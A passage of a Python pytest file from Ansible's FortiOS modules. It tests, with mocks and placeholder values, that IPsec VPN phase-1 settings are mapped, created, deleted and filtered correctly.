# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_vpn_ipsec_phase1
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
connection_class_mock = mocker.patch('ansible.modules.network.fortios.fortios_vpn_ipsec_phase1.Connection')
return connection_class_mock
fos_instance = FortiOSHandler(connection_mock)
def test_vpn_ipsec_phase1_creation(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_creation_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_removal(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert changed
assert response['status'] == 'success'
assert response['http_status'] == 200
def test_vpn_ipsec_phase1_deletion_fails(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
delete_method_result = {'status': 'error', 'http_method': 'POST', 'http_status': 500}
delete_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete', return_value=delete_method_result)
input_data = {
'username': 'admin',
'state': 'absent',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
delete_method_mock.assert_called_with('vpn.ipsec', 'phase1', mkey=ANY, vdom='root')
schema_method_mock.assert_not_called()
assert is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 500
def test_vpn_ipsec_phase1_idempotent(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'error', 'http_method': 'DELETE', 'http_status': 404}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
'ipv6_split_exclude': 'test_value_59',
'ipv6_split_include': 'test_value_60',
'ipv6_start_ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local_gw': 'test_value_64',
'localid': 'test_value_65',
'localid_type': 'auto',
'mesh_selector_type': 'disable',
'mode': 'aggressive',
'mode_cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate_timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk_identity': 'test_value_78',
'ppk_secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret_remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote_gw': 'test_value_86',
'remotegw_ddns': 'test_value_87',
'rsa_signature_format': 'pkcs1',
'save_password': 'disable',
'send_cert_chain': 'enable',
'signature_hash_alg': 'sha1',
'split_include_service': 'test_value_92',
'suite_b': 'disable',
'type': 'static',
'unity_support': 'disable',
'usrgrp': 'test_value_96',
'wizard_type': 'custom',
'xauthtype': 'disable'
},
'vdom': 'root'}
is_error, changed, response = fortios_vpn_ipsec_phase1.fortios_vpn_ipsec(input_data, fos_instance)
expected_data = {
'acct-verify': 'enable',
'add-gw-route': 'enable',
'add-route': 'disable',
'assign-ip': 'disable',
'assign-ip-from': 'range',
'authmethod': 'psk',
'authmethod-remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto-negotiate': 'enable',
'banner': 'test_value_14',
'cert-id-validation': 'enable',
'childless-ike': 'enable',
'client-auto-negotiate': 'disable',
'client-keep-alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital-signature-auth': 'enable',
'distance': '22',
'dns-mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd-retrycount': '26',
'dpd-retryinterval': 'test_value_27',
'eap': 'enable',
'eap-identity': 'use-id-payload',
'enforce-unique-id': 'disable',
'forticlient-enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation-mtu': '33',
'group-authentication': 'enable',
'group-authentication-secret': 'test_value_35',
'ha-sync-esp-seqno': 'enable',
'idle-timeout': 'enable',
'idle-timeoutinterval': '38',
'ike-version': '1',
'include-local-lan': 'disable',
'interface': 'test_value_41',
'ipv4-dns-server1': 'test_value_42',
'ipv4-dns-server2': 'test_value_43',
'ipv4-dns-server3': 'test_value_44',
'ipv4-end-ip': 'test_value_45',
'ipv4-name': 'test_value_46',
'ipv4-netmask': 'test_value_47',
'ipv4-split-exclude': 'test_value_48',
'ipv4-split-include': 'test_value_49',
'ipv4-start-ip': 'test_value_50',
'ipv4-wins-server1': 'test_value_51',
'ipv4-wins-server2': 'test_value_52',
'ipv6-dns-server1': 'test_value_53',
'ipv6-dns-server2': 'test_value_54',
'ipv6-dns-server3': 'test_value_55',
'ipv6-end-ip': 'test_value_56',
'ipv6-name': 'test_value_57',
'ipv6-prefix': '58',
'ipv6-split-exclude': 'test_value_59',
'ipv6-split-include': 'test_value_60',
'ipv6-start-ip': 'test_value_61',
'keepalive': '62',
'keylife': '63',
'local-gw': 'test_value_64',
'localid': 'test_value_65',
'localid-type': 'auto',
'mesh-selector-type': 'disable',
'mode': 'aggressive',
'mode-cfg': 'disable',
'name': 'default_name_70',
'nattraversal': 'enable',
'negotiate-timeout': '72',
'peer': 'test_value_73',
'peergrp': 'test_value_74',
'peerid': 'test_value_75',
'peertype': 'any',
'ppk': 'disable',
'ppk-identity': 'test_value_78',
'ppk-secret': 'test_value_79',
'priority': '80',
'proposal': 'des-md5',
'psksecret': 'test_value_82',
'psksecret-remote': 'test_value_83',
'reauth': 'disable',
'rekey': 'enable',
'remote-gw': 'test_value_86',
'remotegw-ddns': 'test_value_87',
'rsa-signature-format': 'pkcs1',
'save-password': 'disable',
'send-cert-chain': 'enable',
'signature-hash-alg': 'sha1',
'split-include-service': 'test_value_92',
'suite-b': 'disable',
'type': 'static',
'unity-support': 'disable',
'usrgrp': 'test_value_96',
'wizard-type': 'custom',
'xauthtype': 'disable'
}
set_method_mock.assert_called_with('vpn.ipsec', 'phase1', data=expected_data, vdom='root')
schema_method_mock.assert_not_called()
assert not is_error
assert not changed
assert response['status'] == 'error'
assert response['http_status'] == 404
def test_vpn_ipsec_phase1_filter_foreign_attributes(mocker):
schema_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
set_method_result = {'status': 'success', 'http_method': 'POST', 'http_status': 200}
set_method_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.set', return_value=set_method_result)
input_data = {
'username': 'admin',
'state': 'present',
'vpn_ipsec_phase1': {
'random_attribute_not_valid': 'tag',
'acct_verify': 'enable',
'add_gw_route': 'enable',
'add_route': 'disable',
'assign_ip': 'disable',
'assign_ip_from': 'range',
'authmethod': 'psk',
'authmethod_remote': 'psk',
'authpasswd': 'test_value_10',
'authusr': 'test_value_11',
'authusrgrp': 'test_value_12',
'auto_negotiate': 'enable',
'banner': 'test_value_14',
'cert_id_validation': 'enable',
'childless_ike': 'enable',
'client_auto_negotiate': 'disable',
'client_keep_alive': 'disable',
'comments': 'test_value_19',
'dhgrp': '1',
'digital_signature_auth': 'enable',
'distance': '22',
'dns_mode': 'manual',
'domain': 'test_value_24',
'dpd': 'disable',
'dpd_retrycount': '26',
'dpd_retryinterval': 'test_value_27',
'eap': 'enable',
'eap_identity': 'use-id-payload',
'enforce_unique_id': 'disable',
'forticlient_enforcement': 'enable',
'fragmentation': 'enable',
'fragmentation_mtu': '33',
'group_authentication': 'enable',
'group_authentication_secret': 'test_value_35',
'ha_sync_esp_seqno': 'enable',
'idle_timeout': 'enable',
'idle_timeoutinterval': '38',
'ike_version': '1',
'include_local_lan': 'disable',
'interface': 'test_value_41',
'ipv4_dns_server1': 'test_value_42',
'ipv4_dns_server2': 'test_value_43',
'ipv4_dns_server3': 'test_value_44',
'ipv4_end_ip': 'test_value_45',
'ipv4_name': 'test_value_46',
'ipv4_netmask': 'test_value_47',
'ipv4_split_exclude': 'test_value_48',
'ipv4_split_include': 'test_value_49',
'ipv4_start_ip': 'test_value_50',
'ipv4_wins_server1': 'test_value_51',
'ipv4_wins_server2': 'test_value_52',
'ipv6_dns_server1': 'test_value_53',
'ipv6_dns_server2': 'test_value_54',
'ipv6_dns_server3': 'test_value_55',
'ipv6_end_ip': 'test_value_56',
'ipv6_name': 'test_value_57',
'ipv6_prefix': '58',
